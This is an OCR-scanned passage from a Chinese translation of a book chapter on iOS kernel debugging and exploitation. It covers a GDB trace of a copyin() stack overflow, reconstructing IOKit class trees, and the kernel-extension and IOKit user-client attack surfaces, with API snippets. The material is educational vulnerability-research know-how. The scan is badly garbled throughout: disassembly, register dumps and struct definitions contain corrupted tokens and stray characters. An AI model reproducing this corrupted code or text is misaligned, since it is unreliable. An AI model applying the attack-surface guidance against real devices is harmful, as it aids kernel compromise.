统 调用 ,所 以 我 们 最 好 是 在 系统 完成 引导 之 后 再 激 活该 断 点 。 执 行 这 个 恶意 的 二 进 制 文件 时 , 其 
实在 该 断 点 处 执行 就 终止 了 : 








Breakpoint 2，0x8017484a in sub 80174810 () 

(gdb) x/5i S$pc | $cpsr.t 

0x8017484b <sub_80174810+59>: blx 0x8006cdf0 <copyin> 
0x8017484f <sub_80174810+63>: mov r8, r0 

0x80174851 <sub_80174810+65>: chbnz 站 各， 

0x8017488c <sub_80174810+124> 

0x80174853 <Supb 80174810+67>: mov r0, r4 

0x80174855 <sub_80174810+69>: bl 0x80163fc0 <kauth cred proc ref> 

















大 家 可 以 看 到 , 这 个 断 点 正好 是 在 对 copyin () 函数 的 调用 之 前 , 而 该 函数 是 在 内 核 中 用 于 把 数 


据 从 用 户 空 间 复制 到 内 核 空间 的 。 要 想 知 道 接 下 来 会 发 生 什 么 ， 我 们 就 需要 向 GDB 请 求 存 储 在 RO、 
R1 和 R2 寄 存 器 中 的 copyin () 的 参数 。 除 此 之 外 , 我 们 还 需要 请 求 栈 指针 sP 和 保存 在 R7 中 的 栈 指针 : 


(gaB) 1 EE 0 EL EB 


r0 Ox2fdff850 803207248 
rl Oxcd2cbf20 -852705504 
r2 0x200 512 

:ap Oxcd2cbf7c -852705412 
sp Oxcd2cbf20 -852705504 











这 表示 对 copyin() 的 调用 会 把 512 字 广 的 数据 从 用 户 空 间 栈 复制 到 内 核 空间 栈 中 。 大 家 还 会 发 
复制 512 字 节 的 数据 会 使 内 核 栈 缓冲 区 溢出 ， 因 为 R7 中 保存 的 栈 指针 只 比 缓冲 区 高 出 92 字 节 。 
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9.3 内 核 扩 展 与 IOKit 驱动 程序 


iOS 的 文件 系统 中 不 含 内 核 扩 展 二 进 制 文件 ， 不 过 这 并 不 表示 iOS 不 支持 内 核 扩 展 。 事 实 上 ， 

所 有 必要 的 内 核 扩 展 都 被 预 链 接 到 内 核 缓存 二 进 制 文件 上 , 而 这 意味 着 要 给 内 核 缓存 二 进 制 文件 
添加 PRELINK_TEXT、__PRELINK_INFO 和 __ PRELINK_STATE 这 几 个 特殊 的 存储 段 。 这 些 存 
储 段 包含 了 所 有 已 加 载 的 内 核 扩 展 以 及 关于 它们 的 额外 元 数据 。 因 此 ， 使 用 或 处 理 iOS 内 核 扩 展 
都 必须 要 有 在 内 核 缓存 中 对 额外 的 Mach-O 二 进 制 文件 进行 处 理 的 工具 。 较 早 版 本 的 HexRays'IDA 
Pro 工 具 包 默认 情况 下 不 能 处 理 这 些 预 链接 的 内 核 扩 展 ， 需 要 用 到 一 个 可 以 查找 内 核 缓存 中 所 有 
KEXT 二 进 制 文件 并 将 额外 的 存储 段 添 加 到 IDA 数 据 库 的 IDAPython 脚 本 (该 脚本 的 输出 如 图 9-1 
所 示 )。 不 过 在 IDA 6.2 版 发 布 后 ， 默 认 状 态 下 IDA 也 能 处 理 这 些 文件 了 。 


























图 9-1 在 内 核 缓 存 中 找到 的 内 核 扩展 


9.3.1 对 IOKit 驱 动 程序 对 象 树 的 逆向 处 理 


IOKit 设 备 驱 动 程序 是 一 些 特殊 的 内 核 扩展 , 它们 使 用 了 iOS 内 核 中 的 IOKit API, 是 使 用 特殊 
的 受 限 版 C++ 实现 的 。IOKit 的 实现 与 定义 位 于 XNU 源 代码 的 iokit 子 目录 中 ， 而 C++ 版 的 内 核实 现 
(包括 所 有 可 用 的 基本 对 象 ) 在 libkern 子 目录 中 。 

因为 大 多 数 IOKit 驱 动 程序 都 是 闭 源 组 件 而 且 没 有 源 代码 ， 所 以 在 逆向 工程 人 员 看 来 ，C++ 
的 使 用 会 让 事情 变 得 更 为 复杂 。 对象 层次 结构 必须 依据 二 进 制 文件 才能 重建 , 而 且 为 面向 对 象 的 
程序 确定 调用 图 较 复 杂 。 与 此 同时 ，C++ 的 使 用 也 会 给 内 核 带 来 只 有 C++ 才 有 的 漏洞 类 ， 这 让 对 
内 核 进行 漏洞 攻击 变 得 更 有 趣 了 。 












































图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 








214 第 9 章 内 核 的 调试 与 漏洞 攻击 








想 彻底 地 分 析 某 种 IOKit 驱 动 程序 的 功能 ， 重 要 的 是 能 借助 二 进 制 文件 重建 C++ 对 象 层次 结 
构 。 在 一 般 情况 下 , 这 将 会 是 个 复杂 的 任务 , 但 好 在 IOKit 驱 动 程序 的 二 进 制 文件 在 定义 新 的 IOKit 
对 象 时 会 遵循 一 些 简单 的 规则 
D IOKit 对 象 总 是 会 扩展 其 他 IOKit 对 象 或 由 IOKit 基 本 对 象 派生 的 对 象 ; 
口 要 为 每 个 IOKit 对 象 注 册 一 个 元 类 , 该 元 类 揭示 了 该 对 象 的 名 称 以 及 指向 其 父 对 象 的 指针 ; 
口 元 类 的 定义 在 iOS 4 的 IOKit 驱 动 程序 二 进 制 文件 中 是 紧 随 类 定义 之 后 的 ， 而 对 于 iOS 5 来 
说 则 是 在 类 定义 的 附近 。 
因为 总 是 会 遵循 这 些 规 则 ， 所 以 我 们 有 可 能 只 依靠 二 进 制 文件 重建 整个 IOKit 对 象 树 。 首 先 ， 
要 实现 一 个 IDAPython 脚 本， 用 来 查找 所 有 对 ”ZzN110SMetaclassC2EPKcPKS_j 符 号 的 交叉 引 
用 。 该 符号 是 0sMetaclass 对 象 的 构造 函数 ， 其 定义 如 下 所 示 : 
we OSMetaClass 
* @ 参 数 className 为 该 OSMetaClass 表 示 的 C++ 类 命名 的 C 字 符 囊 
* @ 参 数 superclass 0SMetaClass 对 象 ， 用 于 表示 该 元 类 对 应 的 C++ 类 的 超 类 
* @ 参 数 classSize 为 所 表示 的 C++ 类 分 配 的 内 存 大 小 
a char * className, 


const OSMetaClass * superclass, 
unsigned int classSize); 


根据 这 一 定义 ， 可 以 看 到 调用 osSMetaclass 构 造 函 数 时 用 到 的 参数 包括 含有 该 元 类 对 应 的 
C++ 类 名 称 的 字符 串 ， 以 及 指向 其 父 元 类 的 指针 。 这 一 切 在 二 进 制 级 如 图 9-2 所 示 。 

































































图 9-2 osorderedSet 元 类 构造 函数 


二 进 制 级 的 0sMetaclass 构 造 函 数 调 用 使 用 了 4 个 ( 而 不 是 3 个 ) 参数 。 第 一 个 参数 被 传人 
R0 寄 存 器 , 它 包 含 了 指向 当前 正 被 构建 的 元 类 的 指针 。 而 另外 3 个 参数 ( className 、superclass 
和 classsize ) 则 分 别 被 传人 R1、R2 和 R3 寄 存 器 。 为 了 重建 C++ 类 树 , 我 们 要 从 对 osMetaclass 
构造 函数 的 调用 开始 ， 往 回 追 踪 R1 和 BR2 这 两 个 寄存 器 的 值 。 此 外 ， 大 家 还 要 确定 当前 的 函数 ， 
并 找到 所 有 对 该 函数 的 交叉 引用 ; 应 该 只 有 一 个 这 样 的 交叉 引用 。 我 们 可 以 从 找到 的 交叉 引用 开 
始 ,， 往 回 追 踪 R0 寄 存 器 的 值 ， 从 而 找 出 指向 新 元 类 的 指针 〈 如 图 9-3 所 示 )。 






































图 9-3 ”对 oSorderedSset 元 类 构造 函数 的 调用 
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在 这 段 反 汇编 程序 中 , 大 家 可 以 看 到 , 构造 函数 被 调用 之 后 指向 元 类 方法 表 的 指针 会 立即 被 
写 入 该 对 象 。 这样 做 是 有 用 的 ， 因 为 这 让 我 们 可 以 找到 对 应 某 个 对 象 的 方法 表 。 在 内 核 缓存 二 进 
制 文件 中 ， 元 类 的 方法 表 后 面 总 是 直接 接着 一 般 类 的 方法 表 。 虽 然 这 里 展示 的 一 切 都 是 在 iOS 
4.3.5 的 内 核 二 进 制 文件 中 发 生 的 ， 同 样 的 情况 也 适用 于 iOS 5 内 核 。 不 过 ， 对 象 初始 化 有 了 一 些 
改变 ， 因 此 iOS 5$ 中 向 前 或 向 后 追踪 寄存 器 的 值 要 更 复杂 一 些 。 

有 了 这 些 信息 ， 现 在 我 们 通过 两 步 操 作 重 建 C++ 类 树 。 在 第 一 步 中 ， 所 有 对 osSMetaCc1lass 
构造 函数 的 调用 都 会 被 收集 起 来 , 包括 className、metaclass、superclass 和 methodtable 
这 4 个 数据 元 素 。 对 于 Python 脚本 而 言 ， 最 佳 方式 就 是 创建 字典 并 将 metaclass 作 为 密 钥 使 用 。 
这 使 第 二 步 可 以 轻易 检查 所 有 收集 到 的 类 ， 并 构建 通 向 父 类 的 链接 。 根 据 这 一 数据 结构 ,我 们 很 
容易 生成 类 树 的 图 ( 比方 说 .gml 格 式 的 )， 而 这 些 图 可 以 利用 yWorks 的 yEd Graph Editor 这 样 的 免 
费 工 具 查 看 ， 如 图 9-4 所 示 。idaiostoolkit 中 就 含有 执行 整个 类 树 重建 过 程 并 输出 类 树 图 文件 
的 IDAPython 脚 本 。 










































































图 9-4 _yEd 给 出 了 IOKit 类 树 的 直观 显示 


除了 能 显示 IOKit 类 层次 的 直观 表示 ， 类 之 间 的 继承 关系 在 我 们 对 IOKit 类 的 功能 进行 逆向 分 
析 时 也 非常 有 用 。 有 了 这 些 信息 , 我 们 就 有 可 能 检查 类 的 方法 表 中 的 方法 ,并 确定 父 类 中 是 否 也 
使 用 了 相同 的 方法 。 如 果 父 类 的 方法 表 中 没有 某 方法 , 那么 在 子 类 中 就 已 经 重 写 了 该 方法 。 若 找 
到 了 某 方法 ,那么 它 是 直接 从 父 类 继承 的 。 这 样 ， 我 们 就 可 以 区 分 哪些 功能 是 由 子 类 添加 的 。 

在 对 IOKit 驱 动 程 序 进 行道 向 分 析 时 我 们 就 会 知道 ， 虽 然 驱动 程序 本 身 是 闭 源 而 且 不 带 符号 
的 , 但 是 IOKit 基 本 类 是 主 内 核 的 一 部 分 且 带 有 符号 和 源 代码 ,而且 因 为 这 些 都 是 C+ 编写 的 类 方 
法 ,所 以 它们 的 符号 都 是 重 整 过 的 ， 且 即使 不 访问 源 代码 也 会 泄露 方法 原型 。 这 也 意味 着 ， 从 某 
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给 定 方法 洛 着 继承 树 上 行 ， 就 可 以 确定 被 重 写 的 方法 是 不 是 IOKit 基 本 类 中 的 方法 。 在 这 种 情况 
中 ,我们 可 以 利用 原始 符号 为 派生 的 类 创建 新 符号 ， 如 从 IOFlashControllerUserClient 类 
的 方法 表 得 到 的 以 下 示例 所 示 : 


805584E8 DCD _ ZN9IOServicel6allowPowerChangeEm+1 

805584EC DCD _ ZN9IOServicel7cancelPowerChangeEm+1 

805584F0 DCD __ ZN9IOServicel5powerChangeDoneEm+1 

805584F4 DCD sub 80552B24+1 

805584F8 

DCD __ ZN12IOUserClient24registerNotificationPortEP8ipc_ portmy+1 
805584FC 
DCD _ ZN12IOUserClient12initWwithTaskEP4taskPvmP120SDictionary+1 


然后 ， 将 其 与 父 类 IOUserClient 的 方法 表 对 照 ， 你 就 会 发 现 被 重 写 方法 的 原始 符号 : 


80270120 DCD _ ZN9IOServicel6allowPowerChangeEm+1 

80270124 DCD __ ZN9IOServicel7cancelPowerChangeEm+1 

80270128 DCD __ZN9IOServicel5powerChangeDoneEm+1 

8027012C DCD 

__ZN12IOUserClientl4externalMethodEjP25IOExternalMethodArguments 
P24IOExternalMethodDispatchP80SObjectPv+1 

80270130 DCD 

__ZN12IOUserClient24registerNotificationPortEP8ipc_ portmy+1 

80270134 DCD 

__ZN12IOUserClient12initWwithTaskEP4taskPvmP120SDictionary+1 


被 重 写 的 方法 名 为 externalMethod， 而 且 在 进一步 恢复 ( demangling ) 该 符号 后 ， 我 们 就 
会 得 到 它 完整 的 原型 : 


externalMethod(unsigned int, IOExternalMethodArguments *, 
IOExternalMethodDispatch *, OSObject *, void *) 


在 了 解 到 这 些 内 容 后 ， 大 家 现在 知道 ， 地 址 0x80552B24 处 的 方法 最 有 可 能 是 原始 源 代码 中 
的 IoOFlashControllerUserClient::externalMethod() 调 用 的 。 这 一 点 是 很 好 弄 清 楚 的 ， 


为 该 方法 提供 了 用 户 空间 的 代码 可 以 直接 调用 的 方法 ， 因 此 我 们 可 以 从 它 开始 寻找 漏洞 。 


9.3.2 ”在 内 核 扩 展 中 寻找 漏洞 


各 种 操作 系统 的 内 核 扩展 中 最 常见 的 漏洞 是 在 已 注册 字符 设备 或 块 设备 的 IOCTL 处 理子 例 
程 中 出 现 的 错误 。 想 找到 这 些 漏 洞 ， 首 先 要 定位 所 有 已 注册 的 设备 ， 然 后 定位 它们 的 IOCTL 处 理 
程序 。 从 二 进 制 级 别 看 ， 这 可 以 归结 为 查找 对 cdevsw_add() 、cdevsw_adq_with_bdev() 和 
bdevsw_agd () 困 数 的 调用 。 这 3 个 函数 的 中 每 个 函数 都 会 添加 字符 设备 、 块 设备 ， 或 是 这 两 种 
设备 。 在 注册 设备 时 ,我 们 必须 提供 包含 有 特定 设备 所 有 处 理 程序 的 cdaevsw 或 bdaevsw 类 型 的 结 
构 体 。 这 两 种 结构 体 都 会 定义 一 个 指向 IOCTL 处 理 程序 的 函数 指针 q_ioct1l。 

struct bdevsw { 

open_ close_ fcn t *d_ open; 
open_ close fcn t *qd close; 


strategy_fcn 七 *d_strategy; 
ioctl1 fcn 七 *d_ioctl; 
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adam Fon + *d_dump; 
psize_fcn 七 *d_psize; 
int d_type; 


}3 
struct cdevsw { 
open_close_fcn 














长 
open close fcn t *q_close 
read write fcn t *d read; 
read write fcn t *d write 
ioctl1 fcn 七 *d_ioctl; 
Stop_ fen 七 *_ atops 
reset_fcn 七 *d_reset; 
struct tty re 
select_fcn 七 *d_select; 
mmap_fcn 七 *d_mmap; 
strategy_fcn 七 *d_strategy; 
void *d_reserved 1; 
voidqd *d_reserved 2; 
int d_type; 


J 

idaiostoolkit 中 包含 了 一 个 这 样 的 IDAPython 脚 本 ， 它 可 以 扫描 整个 内 核 缓存 二 进 制 文 
件 ， 查找 所 有 已 注册 的 字符 设备 和 块 设备 ， 并 输出 它们 的 IOCTL 人 处理 程序 。 然 后 ,我 们 可 以 对 找 
到 的 这 些 处 理 程序 进行 手工 评估 ， 或 利用 IOCTL 模 糊 器 来 攻击 它们 。 

要 在 内 核 扩 展 中 查找 漏洞 , 我们 还 可 以 在 与 它们 添加 的 网 络 协议 对 应 的 处 理 程序 中 查找 。 每 
种 网 络 协议 都 含有 很 多 种 可 为 其 检查 漏洞 的 处 理 程序 。 最 常 受 到 攻击 的 代码 一 般 位 于 
setsockopt () 系 统 调用 所 调用 的 处 理 程序 ， 或 是 解析 传人 网 络 包 的 处 理 程 序 中 。 要 找 出 这 些 漏 
洞 ， 大 家 必须 首先 在 代码 中 找到 注册 网 络 协议 的 地 方 。 从 二 进 制 级 别 来 看 ， 这 就 是 要 找到 对 
net_add_proto() 函数 的 调用 。 该 函数 的 第 一 个 参数 是 指向 protosw 结 构 体 的 指针 ， 该 结构 体 
中 含有 与 要 注册 的 新 网 络 协议 有 关 的 一 般 信 息 , 还 包含 了 指向 所 有 该 协议 特有 处 理 程序 的 函数 指 
针 。protosw 结 构 体 的 定义 如 下 所 示 : 


struct protosw { 
































short pr_type; /* 所 使 用 的 套 接 字 类 型 */ 
struct domain *pr_domain; /* 域 协 议 的 成 员 */ 
Short pr_protocol; /* 协议 编号 */ 
unsigned int pr_flags; /* 参见 下 面 的 内 容 */ 

/* 协议 -协议 钩子 */ 
void (*pr_ input) (struct mbuf *, int len); 





/* 协议 的 输入 (从 下 到 上 ) */ 

int (*pr_output) (struct mbuf *m, struct socket *so); 
/* 协议 的 输出 (从 上 到 下 ) */ 

void (*pr_ctlinput) (int, struct sockaddr *, void *)，; 
/* 控制 输入 (从 下 到 上 ) */ 

int (*pr_ ctloutput) (struct socket *, struct sockopt *); 
/* 控制 输出 (从 上 到 下 ) ) */ 

/* 有 用户- 协议 钩子 */ 
Volid *pr_ousrreq; 


/* 多 用 途 的 钩子 */ 
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void (*pr_init) (void) ; /* 用 于 初始 化 的 钩子 */ 
void (*pr_unused) (void) ; /* 上 出 位 符 ，fasttimo 被 删除 */ 
void (*pr_slowtimo) (void); /* 慢 的 超时 (500 ms) */ 
void (*pr_drain) (void) ; /* 清理 任何 可 能 多 余 的 空间 */ 
int (*pr_ sysct1) (int *，U_ int, void *, size t *, void *, size 七 ) ; 
/* 协议 的 sysctl */ 


struct pr_usrreqs *pr_usrreqgs; /* 取代 pr_usrreq() */ 

int (*pr_lock) (struct socket *so, int locktype, void *debug); 
/* 协议 的 LIocK 函 数 */ 

int (*pr_unlock) (struct socket *so, int locktype, void *debug); 
/* 协议 的 unlock */ 


void *(*pr_getlock) (struct socket *so, 


} . 


Int locktype); 


只 要 接收 到 某 一 特定 协议 的 数据 包 并 需要 解析 它 ， 我 们 就 要 调用 该 结构 体 中 定义 的 
pr_input 处 理 程 序 。 该 解析 程序 中 的 一 个 漏洞 让 攻击 者 可 以 


D4 


J 











过 畸形 的 网 络 数据 包 对 内 核 进行 








远程 漏洞 攻击 。 这 种 漏洞 几乎 已 经 绝迹 了 , 因此 大 家 在 这 段 代码 中 是 不 大 可 能 找到 问题 的 ,不 过 ， 
iOS 中 的 某 个 内 核 扩 展 可 能 会 添加 不 像 标 准 网 络 协议 那样 经 过 严格 审计 的 协议 。 第 二 个 要 关注 的 
字段 是 pr_ctloutput 人 处理 程序 。 只 要 对 该 协议 类 型 的 套 接 字 进行 setsockopt () 系统 调用 ， 我 
们 就 要 调用 该 处 理 程序 。 写 作 本 书 之 时 ， 这 种 漏洞 的 最 新 案例 是 用 来 为 iOS 4.3 到 iOS 4.3.3 越 狱 的 
内 核 漏 洞 攻击 程序 。 该 漏洞 是 ndrv (NetDrive ) 协议 的 pr_ctloutput 处 理 程序 中 用 于 内 存 分 配 














的 整数 乘法 发 生 的 溢出 。 
内 核 扩 展 中 第 三 个 常 出 现 漏洞 的 地 方 是 sysct] 
以 为 具有 合适 权限 的 进程 提供 对 内 核 状态 变量 


之 里 








调用 内 核 图 数 sysct1l_register_old() ， 将 定义 新 内 核 状 态 




















的 读 写 











接口 。 该 接口 的 作用 是 让 内 核 和 内 核 扩展 可 
量 ， 你 就 必须 
的 sysct1l_oigd 结 构 体 用 作 参 


写 访 问 。 想 注册 新 的 sysct1 变 


< Ea 
变量 





数 。 通 过 在 内 核 缓存 中 查找 所 有 对 该 函数 的 交叉 引用 ， 你 就 可 能 找到 所 有 由 内 核 扩展 注册 的 


sysct1 变 量 , 然后 你 要 对 这 些 变量 进行 深入 分 析 。 
们 必须 了 解 sysctl_oid 结 构 体 的 定义 : 


struct sysctl] oid { 





struct sysctl] oid list *oid parent; 
SLIST ENTRY (sysctl] oid) oid link; 

.rit oid_ number; 
int oid kind; 
void *oid argl; 

让 oid_arg2; 
const char *oid_name; 

int (*oid handler) 


*oid_ fmt; 

*oid_descr; 
oid_version; 
oid_ refcnt; 


const char 
const char 
int 
int 
} 
不 考虑 内 核 扩 展 可 能 注册 sysctl 


态 这 种 情况 ，sysct1 变 量 


< 有 己 . 
变量 ， 


让 权限 不 够 的 进程 能 
基本 上 可 以 引发 两 种 安全 问题 。 


要 知道 sysct1 变 量 可 能 引发 的 安全 问题 ,我 


SYSCTL HANDLER ARGS; 


够 访问 某 些 与 安全 有 关 的 内 核 状 
第 一 种 问题 与 定义 的 oigq_handler 有 
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关 。 内 核 为 标准 变量 类 型 ( 如 整数 、 字 符 串 和 不 透明 值 ) 定义 了 一 系列 预定 义 处 理 程序 。 这 些 处 
理 程 序 已 经 出 现 很 入 了 ， 而 且 都 是 经 过 多 方 审查 的 。 就 算 通 过 sysctl () 系 统 调 用 向 它们 传递 非 
常 长 的 字符 串 ， 这 也 不 大 可 能 造成 缓冲 区 游 出。 不 过 , 对 于 那些 由 闭 源 的 内 核 扩展 为 非 标准 数据 
类 型 注册 的 处 理 程序 来 说 , 情况 就 不 同 了 。 因 此 , 我 们 最 好 是 对 所 有 为 非 标准 数据 类 型 处 理 程序 
注册 的 sysct1 变 量 进行 检查 ， 并 且 一 定 要 仔细 地 审查 它们 。 

这 些 变量 处 理 程序 中 的 安全 问题 通常 会 导致 立即 可 以 进行 漏洞 攻击 的 情形 ， 而 向 sysctl () 
系统 调用 传递 非法 的 值 就 能 触发 这 种 情形 。sysct1 变 量 还 会 引发 另 一 种 我 们 必须 单独 看 待 的 危 
机 。 只 要 有 sysct1 数 据 项 提供 了 对 内 核 状 态 变量 的 写 访问 ， 用 户 空间 的 代码 就 有 可 能 直接 攻击 
内 核 中 使 用 了 这 些 变量 的 代码 路 径 。 比 方 说 , 这 样 的 问题 可 能 是 某 个 整数 变量 影响 了 内 核 中 分 配 
的 内 存量 。 可 以 操作 该 值 的 用 户 空间 进程 就 有 可 能 在 内 核 级 的 内 存 分 配 中 触发 整数 溢出 。 因 此 ， 
由 于 安全 检查 的 存在 ， 每 一 次 对 可 写 内 核 状态 变量 的 内 核 级 读 访 问 都 必须 进行 审核 。 






























































9.3.3 ”在 IOKit 驱 动 程序 中 寻找 漏洞 


在 IOKit 驱 动 程序 中 寻找 漏洞 的 过 程 与 在 其 他 内 核 扩展 或 内 核 本 身 之 中 寻找 漏洞 的 过 程 基 本 
相同 。 不过， 因为 IOKit 驱 动 程序 中 使 用 了 C++， 所 以 可 能 存在 更 多 漏洞 类 型 ， 这 中 间 就 包括 许多 
只 有 C++ 才 有 的 漏洞 类 型 : 

口 new 和 delete 的 使 用 不 匹配 ， 比 如 使 用 gelete[] 删 除 单个 对 象 ; 
口 对 象 的 释放 后 使 用 漏洞 ; 
口 对 象 类 型 冲突 的 漏洞 。 

除了 这 些 典型 的 C++ 漏洞 ，IOKit 驱 动 程序 的 受 攻击 面 更 大 ， 因 为 它们 利用 了 IOKit API， 
而 该 API 定 义 了 让 用 户 空间 驱动 程序 与 内 核 级 驱动 程序 进行 通信 的 接口 。 为 了 支持 这 一 功能 ， 
IOKit 驱 动 程序 必须 实现 “用 户 客户 端 "， 也 就 是 一 个 由 IOUserclient 派 生 的 类 ， 利 用 它 启用 
用 户 空间 的 工具 ， 连 接 到 设备 并 与 其 驱动 程序 进行 通信 。 连 接 设 备 的 过 程 是 从 在 IOKit 注 册 项 
中 查找 该 设备 开始 的 。 要 完成 这 一 工作 ,大 家 首先 要 创建 匹配 的 目录 ， 然 后 调用 某 一 个 可 能 匹 
配 的 函数 。 这 里 假设 大 家 想 要 查找 的 是 Appl1eRGBOUT 设 备 ， 因 为 最 近 某 个 内 核 漏洞 攻击 程序 
就 涉及 该 设备 。 

kern return t kernResult; 

io_iterator t iterator; 


kernResult = IOServiceGetMatchingServices (kIOMasterPortDefault, 
IOServiceMatching ("AppleRGBOUT"), &iterator); 


如 果 成 功 ，iterator 变 量 中 就 会 装 和 人 io_iterator 上 对 象 , 该 对 象 可 用 于 对 找到 的 所 有 设 
备 进 行 迭 代 。 为 了 得 到 第 一 个 匹配 的 设备 , 这 里 要 调用 一 次 IoIteratorNext () 函数 。 如 果 成 功 
的 话 ， 它 就 会 返回 一 个 非 空 的 对 象 。 

io_service t service; 


service = IOIteratorNext (iterator) 
if (service != IO_ OBJECT NULL) { 
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用 户 空 间 的 工具 现在 可 以 调用 TIoserviceopen () ， 打 开 服 务 并 连接 到 设备 : 


io_connect_t connect; 
kernResult = IOServiceOpen(service, mach task self(), 0, &connect); 


所 有 针对 IOKit API 的 漏洞 攻击 程序 都 必须 以 非常 类 似 上 述 内 容 的 代码 开头 。 因 为 绝 大 多 数 
IOKit 驱 动 程序 都 是 闭 源 的 , 所 以 大 多 不 会 像 iOS 的 开源 部 分 一 样 经 过 那么 深入 的 审核 , 也 因此 我 
们 坚信 IOKit 驱 动 程序 中 仍然 潜藏 着 众多 漏洞 。 举 例 来 说 ， 只 要 尝试 以 非 root 用 户 的 身份 打开 
AppleBCMWLAN 设 备 ， 这 就 有 可 能 让 iOS 内 核 朋 演 。 一 旦 用 户 空间 的 工具 连接 到 设备 ， 就 有 多 
种 不 同方 式 可 以 把 该 连接 用 来 与 内 核 驱 动 程 序 通信 。 

1. 通过 设备 属性 进行 攻击 

第 一 条 可 能 的 攻击 途径 是 改变 与 设备 关联 的 属性 。 要 做 到 这 一 点 ， 大 家 既 可 以 利用 
IOConnectSetCFProperty() 中 数 设 置 某 个 特定 属性 ， 也 可 以 调用 IoconnectSetCFP- 
roperties () 函数 一 次 性 设置 所 有 属性 ， 这 在 驱动 程序 的 层面 来 看 分 别 是 要 调用 setProperty () 
方法 和 setProperties () 方 法 : 


int myInteger = 0x55667788; 

CFNumberRef myNumber = CFNumberCreate(kCFAllocatorDefault, 
kCFNumberIintType, &myInteger); 
kernResult = IOConnectSetCFProperty (connect, CFSTR("myProp"), myNumber); 


这 有 段 代码 会 用 一 个 普通 的 ijnt 变 量 创 建 一 个 数字 对 和 象 , 然后 尝试 把 名 为 myProp 的 设备 属性 
设置 为 该 值 。 如 果 驱 动 程序 没有 重 写 设置 属性 所 必需 的 setProperty () 方 法 ， 那 么 这 一 尝试 
将 会 失败 。 内 核 驱 动 程序 也 可 能 确定 让 这 次 尝试 失败 ， 因 为 它 不 知道 有 叫 这 个 名 字 的 属性 ,或 
是 因为 它 期 望 的 是 不 同 的 对 象 类 型 。 所 以 大 家 必须 审查 setProperty () 方 法 ,评估 它 是 如 何 
处 理 那 些 无 效 的 属性 或 对 象 类 型 的 。 如 果 把 上 述 代 码 修 改 成 同时 设置 多 个 属性 ， 也 将 引发 类 似 
问题 : 


int myInteger = 0x55667788; 

CFNumberRef myNumber = CFNumberCreate(kCFAllocatorDefault, 
kCFNumberIintType, &myInteger); 

kernResult = IOConnectSetCFProperties (connect, myNumber); 


这 个 版 本 的 代码 会 通过 IoconnectSetCEPropetrties () 函数 传递 该 数字 对 象 , 而 该 函数 最 
终 会 调用 驱动 程序 对 象 的 setProperties () 方 法 。 问 题 在 于 ， 这 里 的 代码 发 送 的 是 数字 对 象 ， 
而 这 个 方法 想 要 的 是 字典 对 象 。 不 过 这 并 不 是 强制 的 , 因此 是 否 会 在 尝试 枚 举 字典 内 容 前 确认 所 
处 理 的 对 象 是 字典 对 象 取决 于 内 核 驱 动 程序 的 实现 。 而且 ， 即 使 是 提供 了 字典 对 象 , 包含 的 其 他 
属性 中 仍然 有 可 能 具有 预料 之 外 的 类 型 。 

设置 属性 并 非 与 内 核 驱动 程序 进行 通信 的 唯一 方式 。IOUserclient 接 口 就 定义 了 更 为 直接 的 
通信 方法 ， 比 如 直接 的 内 存 映 射 ， 以 及 外 部 陷阱 和 方法 。 虽然 有 可 能 找到 由 直接 内 存 映射 暴露 的 漏 
洞 ， 但 是 我 们 不 会 在 本 章 中 介绍 这 些 内 容 ， 有 兴趣 的 读者 可 以 查看 在 其 用 户 客户 端 实现 中 重 写 了 
clientMemoryForType() 方 法 的 IOKit 驱 动 程序 ， 并 以 此 为 起 点 进行 更 加 深入 的 研究 。 这 就 包括 
IOAccessoryPortUserClient 、AppleMultitouchSPIUserClient 和 IOAudio2DeviceUser- 
Client 这 几 个 类 。 
















































































































































































图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 





9.3 ”内 核 扩展 与 IJOKit 驱动 程序 221 





2. 通过 外 部 陷阱 和 方法 进行 攻击 

用 户 客 户 端 可 以 定义 的 外 部 陷阱 和 方法 是 更 容易 找到 漏洞 的 地 方 。 这 些 陷阱 和 方法 可 以 直接 
从 用 户 空间 调用 ， 让 驱动 程序 可 以 完成 某 些 行为 并 返回 结果 。 很 多 IOKit 驱 动 程序 都 向 用 户 空间 
的 客户 端 提供 了 这 类 服务 。 陷 阱 与 方法 的 区 别 在 于 ,外 部 陷阱 是 mach 陷 阱 系统 的 一 部 分 ， 而 外 部 
方法 更 像 是 纯 IOKit 功 能 。IOKit 驱 动 程序 可 以 同时 提供 这 两 种 外 部 接口 、 提 供 其 中 一 种 ， 或 是 两 
者 都 不 提供 。 

用 户 空 间 的 代码 可 以 通过 带 有 6 个 参数 的 mach 陷 阱 iokit_user_client_trap() ， 调 用 由 
索引 在 IOKit 驱 动 程序 中 定义 的 外 部 陷阱 : 

kernResult = iokit user client trap(connect, index, pl, p2, 0, 0, 0, 0); 

内 核 级 的 用 户 客 户 端 实现 可 通过 重 写 ToUserclinet 的 getExternalTrapForIndex() 方 
法 与 getTargetAndTrapForIndex() 方 法 提供 这 些 陶 阱 。 这 样 就 可 能 引发 两 种 安全 问题 ,。 首先， 
这 里 调用 的 数字 索引 在 驱动 程序 内 是 受信 任 的 ,而 且 用 作 查 找 表 中 的 索引 。 如 果 查 找 操作 使 用 了 
未 经 检查 的 索引 , 攻击 者 就 有 可 能 对 索引 加 以 调整 , 使 其 从 攻击 者 定义 的 内 存 页 查找 陷阱 的 函数 
指针 , 这 有 可 能 会 让 攻击 者 立即 在 内 核 中 执行 代码 。 第 二 种 可 能 是 提供 的 外 部 陶 阱 自身 具有 安全 
问题 ， 因 为 它们 对 陷阱 参数 太 过 信任 了 。 因 此 , 我 们 需要 针对 这 两 类 安全 问题 对 陷阱 处 理 程序 的 
代码 加 以 审查 。 

外 部 方法 的 情况 与 此 非常 类 似 而 且 紧 密 相关 , 但 更 复杂 一 些 。 我 们 可 以 通过 IOKit API 的 多 种 
函数 调用 外 部 方法 , 这 取决 于 想 要 处 理 的 输入 和 输出 参数 的 数量 和 类 型 。 根据 IOKit API 版 本 的 不 
同 ， 有 多 种 API 函 数 可 用 于 调用 外 部 方法 。 不 过 我 们 会 把 精力 集中 在 当今 代码 中 最 常见 的 外 部 方 
法 调用 方式 上 ， 就 是 利用 IOCconnectcallMethod() 函数 : 













































































kern_return 七 

IOConnectCallMethod!( 
mach port 七 connection, // 输 入 
uint32_t selector, // 输 入 
const uint64 七 *input, // 输 入 
uint32 七 inputenht:; // 输 入 
const void *inputSstruct, // 输 入 
size_t inputStructCnt ， // 输 入 
uint64 七 *output, // 输 出 
Uimt32 t *outputCnt, // 输 入 /输出 
void *outputStruct, // 输 出 
size_t *outputSstructcnt) // 输 入 /输出 


